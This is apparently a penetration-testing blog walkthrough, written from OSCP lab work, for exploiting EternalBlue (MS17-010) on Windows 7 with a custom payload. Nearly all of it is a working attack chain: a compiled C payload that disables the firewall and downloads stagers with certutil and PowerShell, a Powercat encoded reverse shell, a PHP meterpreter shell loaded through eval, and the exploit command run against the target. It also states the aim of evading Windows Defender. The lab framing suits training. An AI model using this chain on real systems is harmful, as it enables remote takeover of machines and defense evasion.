Exploit Eternal Blue (MS17–010) for Window 7 and higher (custom payload)
Summary
This article shows you how to exploit the MS17–010 vulnerability on Windows 7 or higher.
Disclaimer
This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
Why this post?
During my OSCP training I had a lot of trouble rooting the Eternal Blue targets. After many hours of troubleshooting, it finally worked. I would like to save others from wasting precious lab time.
This walkthrough has been prepared in such a way that it should always work on systems running on Windows 7 or higher and vulnerable for MS17–010. See my other blog for the Windows XP procedure.
We will exploit the 'Eternal Blue' vulnerability with custom payload. To be exact, we will create an executable file that:
- is not detected as malware by the Windows Defender software
- disables the Windows Firewall
- works on systems without (access to) PowerShell
The end result may be 2different reverse shells (at least one should work for your target):
- a ‘stealth’ Powercat reverse shell (port 25) > you get this on 'Bruce' …
- a ‘stealth’ meterpreter php reverse shell (port 53)
The POC consists of two machines: the victim (Windows 7 64bits) and the attacker machine (Kali Linux 2022.1).
victim:
- Windows 7 Professional [version 6.1 7601]
- IP address: 192.168.62.169
- Security: Default Windows firewall (all profiles enabled).
Attacker (for reverse shell):
- Kali Linux (we will use variables 'kali' or 'LHOST')
- IP-Address: 192.168.62.161
In this guide I will use the term 'kali' and 'LHOST' interchangeably. You need to change the ip-address to your attacker system.
Prerequisites
We start by installing preconditions that must be in place before we can run the exploit.
1. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download and install the latest version of Impacket. Set the directory world-writable (yes, this is necessary).
cd /opt
sudo git clone https://github.com/SecureAuthCorp/impacket.git
sudo chmod 777 /opt/impacket -R
2. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Install the virtualenv tool.
sudo apt install virtualenv
3. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a python2 virtual environment inside the Impacket directory
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
Result: you should have a prompt change to ‘(impacket-venv)’.
4. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install pip for python2.
cd /tmp
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py -O /tmp/get-pip.py --no-check-certificate
sudo python2 get-pip.py
5. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install Impacket requirements
cd /opt/impacket
pip install -r requirements.txt
pip install .
Enumeration.
Now that you have updated your system with the requirements to run the exploit, you can start scanning the target machine (Windows 7 in our case).
6. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Use nmap to scan the target machine for SMB vulnerabilities.
cd /usr/share/nmap/scripts
target=192.168.62.169
p=445
scriptargs='smbpass=','smbdomain=mydomain.com','unsafe=1'
for script in $(ls smb* | grep -v -e brute -e flood); do echo "=== $script ==="; sudo nmap $(echo $target) -script=$script -script-args="${scriptargs}" -p $p| grep "|" ; done
Our target machine is vulnerable for MS17–010!
Payload creation (for Window 7 and higher)
Our final payload will be an executable file that:
- Is not removed by the Windows Defender software
- Disables the Windows Firewall
- Works on systems without Powershell
- Will setup a ‘stealth’ Powercat reverse shell (port 25)
- Will setup a ‘stealth’ meterpreter php reverse shell (port 53)
Everything we need in order to run the exploit is copied to the /tmp directory on Kali. We will make this directory available through the Python simple HTTP Server.
7. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Copy and paste the C code below to create source file /tmp/backup.c. (Adjust the value for kali=<ip-address with your kali host).
LHOST=192.168.62.161
portweb=80
rshell=shell-25.txtcd /tmp
echo '#include <stdlib.h>'> testexe.c
echo 'int main ()' >> testexe.c
echo '{'>> testexe.c
echo 'int i;' >> testexe.c
# Add userecho 'i = system ("netsh advfirewall set allprofiles state off");' >> testexe.c
# Download files
echo i = system \("\"certutil.exe -urlcache -split -f \\"\""http://${LHOST}:${portweb}/backup.bat\\"\"" C:\\\\\Windows\\\\\Tasks\\\\\\\backup.bat"\"\)\; >> testexe.c
echo i = system \("\"certutil.exe -urlcache -split -f \\"\""http://${LHOST}:${portweb}/php.exe\\"\"" C:\\\\\Windows\\\\\Tasks\\\\\\\php.exe"\"\)\; >> testexe.c
echo i = system \("\"certutil.exe -urlcache -split -f \\"\""http://${LHOST}:${portweb}/php7.dll\\"\"" C:\\\\\Windows\\\\\Tasks\\\\\\\php7.dll"\"\)\; >> testexe.c
echo i = system \("\"powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://${LHOST}:${portweb}/backup.bat','C:\\\\\Windows\\\\\Tasks\\\\\\\backup.bat')"\"\)\; >> testexe.c
# Execute files
echo i = system \(\"ping -n 1 $LHOST\"\)\; >> testexe.c
echo 'i = system ("START /B c:\\\\Windows\\\\Tasks\\\\backup.bat");' >> testexe.c
echo i = system \(\"icacls c:\\\\\\Windows\\\\\\Tasks\\\\\\\\* /c /t /grant everyone:f\"\)\; >> testexe.cecho 'return 0;' >> testexe.c
echo '}' >> testexe.c
Result is source file /tmp/testexe.c
8. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Compile /tmp/testexec.c to /tmp/ruby.exe (ruby.exe is arbitrary, it can be something else if you want).
# Compile as x86 Windows PE file
/usr/bin/i686-w64-mingw32-gcc /tmp/testexe.c -o /tmp/ruby.exe
You have now created a Windows payload file. The next steps are to prepare the related files that will be called by the payload file (ruby.exe).
PHP meterpreter reverse shell payloay
If you confident that you can use PowerShell on your target, you can also skip this php section and continue with Powercat. You don't need to adjust the ruby.exe file (steps 7 and 8).
Our final payload file (ruby.exe) will setup a PHP meterpreter reverse shell on TCP port 53. This is done by the following lines of code:
i = system (“certutil.exe -urlcache -split -f \”http://192.168.62.161:80/backup.bat\" C:\\Windows\\Tasks\\backup.bat”);
i = system (“certutil.exe -urlcache -split -f \”http://192.168.62.161:80/php.exe\" C:\\Windows\\Tasks\\php.exe”);
i = system (“certutil.exe -urlcache -split -f \”http://192.168.62.161:80/php7.dll\" C:\\Windows\\Tasks\\php7.dll”);
You can read more about a ‘stealth’ PHP Meterpreter shell in my article:
9. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download the php 7.x executables for Windows x86. Extract all file from the *.zip file and copy the 2 relevant files to our staging directory /tmp. Check https://windows.php.net/downloads/releases for the latest 7.x version. Copy the latest Win32 x86 php zip file name.
phpzip=php-7.4.30-nts-Win32-vc15-x86.zip
mkdir /tmp/php-x86 2>/dev/null
wget https://windows.php.net/downloads/releases/${phpzip} -O /tmp/${phpzip}
cd /tmp/php-x86
unzip /tmp/${phpzip}cp /tmp/php-x86/php.exe /tmp
cp /tmp/php-x86/php7.dll /tmp
10. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Create (meterpreter) reverse shell code for PHP
LHOST=192.168.62.161
LPORT=53
payload="reverse_php meterpreter_reverse_tcp"
for payload in $(echo $payload); do msfvenom -p php/$payload LHOST=$LHOST LPORT=$LPORT -f raw > /tmp/${payload}.php; done
Powercat encoded reverse shell payload
Our final payload file (ruby.exe) will setup a ‘stealth’ Powercat reverse shell on TCP port 25. This is done by the following line of code:
i = system (“powershell.exe -c (New-Object System.Net.Webclient).DownloadFile(‘http://192.168.62.161:80/backup.bat','C:\\Windows\\Tasks\\backup.bat')");
You can read more about a ‘stealth’ Powercat reverse shell in my article:
11. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download powercat.ps1, execute Powercat and create an encoded payload file (/tmp/shell-25.txt).
LHOST=192.168.62.161
LPORT=25
rshell=shell-25.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /tmp/$rshell
12. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Create a Windows batch file (/tmp/backup.bat). This batch file is called by our final payload file (ruby.exe).
LHOST=192.168.62.161
portweb=80
rshell=shell-25.txt
echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${LHOST}:${portweb}/${rshell}');iex 'powershell -E \$code'" >/tmp/backup.bat
echo START /B c:\\Windows\\Tasks\\php.exe -d allow_url_fopen=true -r "eval(file_get_contents('http://$LHOST:$portweb/meterpreter_reverse_tcp.php'));" >>/tmp/backup.bat
Set up the required listeners
Next open a new instance of Bash Terminal. Open a new tab for each “listener”. You will need 5 open tabs for all required listeners.
13. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Set up a HTTP stager in order to download essential files to the target.
python3 -m http.server 80 — directory /tmp
14. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Set up a TCPdump ICMP listener (to troubleshoot network issues). Use tun0 when you’re on a VPN.
sudo tcpdump -i eth0 icmp
15. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a PHP Meterpreter listener on port 53 to catch the PHP connection.
LHOST=192.168.62.161
LPORT=53
PAYLOAD=php/meterpreter_reverse_tcp
sudo msfconsole -qn -x "use exploit/multi/handler; set PAYLOAD $PAYLOAD; set LHOST $LHOST; set LPORT $LPORT; run";
16. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a netcat listener on port 25 to catch the Powercat connection.
rlwrap nc -nlvp 25
Prepare MS17–010 exploit
We have now made our preparations for the payload. The next section is about running the actual exploit. Open a new Bash Terminal instance to execute the commands.
17. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download the exploit.
cd /tmp
git clone https://github.com/helviojunior/MS17-010.git
18. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a Python2 environment inside the Impacket folder
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
19. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the Python2 virtual environment ‘(impacket-venv)’, run the exploit against our target (192.168.62.169) with our payload file (/tmp/ruby.exe)
python2 /tmp/MS17-010/send_and_execute.py 192.168.62.169 /tmp/ruby.exe
Check out our results:
HTTP listener
All files are downloaded. Some files our downloaded more the once, that's because ofredundancy in case PowerShell is not available.
ICPM listener
We have network connection (we already new this, because our HTTP listener was hit).
PHP Meterpreter listener
We got a Meterpreter shell. You can also change the payload to have a non-meterpreter shell.
Powercat listener
This worked!
Our exploit against the Windows 7 target worked with 2 different shells.
In my next blog, I will show how to do this with an XP target, so can root "Alice".